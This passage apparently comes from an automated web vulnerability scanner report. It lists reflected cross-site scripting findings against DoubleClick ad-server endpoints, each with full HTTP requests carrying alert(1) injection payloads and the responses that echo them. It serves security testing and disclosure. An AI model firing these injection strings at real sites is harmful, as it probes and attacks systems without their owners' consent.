Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 13:20:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7889

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/19f/%2a/c%3B234501632%3B1-0%3B0%3B57841699%3B3454-728/90%3B40013199/40030986/2%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l8e7f3"-alert(1)-"8abaf15a711&ai=B33XYFyxZTbT8PJ_6lAen3LGaC_HctfkBycz95Byx0dnYSwAQARgBIL7O5Q04AFCs18v4BmDJhqOH1KOAEKAB55Lc3gO6AQk3Mjh4OTBfYXPIAQnaAUhmaWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9leHBsb2l0cy9lbnRlcnByaXNlLWV4cGxvaXQtY292ZXJhZ2Ut
...[SNIP]...

1.23. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 was submitted in the !category parameter. This input was echoed as f6345"style="x:expression(alert(1))"760be3c0573 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;f6345"style%3d"x%3aexpression(alert(1))"760be3c0573 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 485

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;f6345"style="x:expression(alert(1))"760be3c0573;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.24. http://ad.doubleclick.net/adi/interactive.wsj.com/articletools_sponsor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/articletools_sponsor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b967b"style%3d"x%3aexpression(alert(1))"43f320cd246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b967b"style="x:expression(alert(1))"43f320cd246 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/articletools_sponsor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;ord=2655265526552655;&b967b"style%3d"x%3aexpression(alert(1))"43f320cd246=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 488

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/f;44306;0-0;0;35222280;1510-234/31;0/0/0;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=2;sz=234x31;&b967b"style="x:expression(alert(1))"43f320cd246=1;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.25. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 was submitted in the !category parameter. This input was echoed as 24f47"style="x:expression(alert(1))"ed49986df20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;24f47"style%3d"x%3aexpression(alert(1))"ed49986df20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 604

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;24f47"style="x:expression(alert(1))"ed49986df20;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.26. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_intelligentinvestor [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/markets_intelligentinvestor

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ad783"style="x:expression(alert(1))"7c9d84b3db8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/markets_intelligentinvestor;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;ord=1464146414641464;&ad783"style%3d"x%3aexpression(alert(1))"7c9d84b3db8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704329104576138271281667798.html?mod=WSJ_hp_MIDDLENexttoWhatsNewsThird
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 607

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/m;223842848;0-0;1;28789269;33675-377/135;40456624/40474411/1;;~okv=;!category=;page=article;msrc=WSJ_hp_MIDDLENexttoWhatsNewsThird;;mc=b2pfreezone_super;tile=4;sz=377x135;&ad783"style="x:expression(alert(1))"7c9d84b3db8=1;~aopt=2/0/ff/0;~sscs=%3fhttps://services.wsj.com/Gryphon/jsp/retentionController.jsp?page=10349&S=6TAWAD">
...[SNIP]...

1.27. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 was submitted in the !category parameter. This input was echoed as 44e25"style="x:expression(alert(1))"92bb3f4bb02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;44e25"style%3d"x%3aexpression(alert(1))"92bb3f4bb02 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 532

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;1-0;0;31680223;1839-230/70;40077459/40095246/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;44e25"style="x:expression(alert(1))"92bb3f4bb02;~aopt=6/0/ff/0;~sscs=%3fhttp://www.wsjwine.com/2857005?reflink=djm_newsreel_wine">
...[SNIP]...

1.28. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a17"style="x:expression(alert(1))"c28df2770ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;ord=6560656065606560;&b5a17"style%3d"x%3aexpression(alert(1))"c28df2770ea=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:37:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 537

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/s;215945709;0-0;0;31680223;1839-230/70;31981065/31998941/1;;~okv=;!category=;page=newsReelAd;;mc=b2pfreezone;tile=2;sz=230x70;&b5a17"style="x:expression(alert(1))"c28df2770ea=1;~aopt=6/0/ff/0;~sscs=%3fhttps://www.wsjwine.com/discovery_offer.aspx?promo=2033001">
...[SNIP]...

1.29. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 was submitted in the u parameter. This input was echoed as 73876"style="x:expression(alert(1))"392e3d7bbf7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The demonstrated PoC attack uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;ord=3623362336233623;73876"style%3d"x%3aexpression(alert(1))"392e3d7bbf7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748704329104576138271281667798
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 429

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3aae/0/0/%2a/l;44306;0-0;0;31680223;31596-2/94;0/0/0;u=;~okv=;u=;!category=;;mc=b2pfreezone;tile=1;sz=2x94;73876"style="x:expression(alert(1))"392e3d7bbf7;~aopt=2/0/ff/0;~sscs=%3f">
...[SNIP]...

1.30. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd5ff'-alert(1)-'9030ba385d0 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:38:21 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0cd5ff'-alert(1)-'9030ba385d0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.31. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ed56"-alert(1)-"dde2af71df5 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Fri Jan 07 16:14:18 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n<!-- Code auto-generated on Wed Jan 05 16:42:54 EST 2011 -->\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
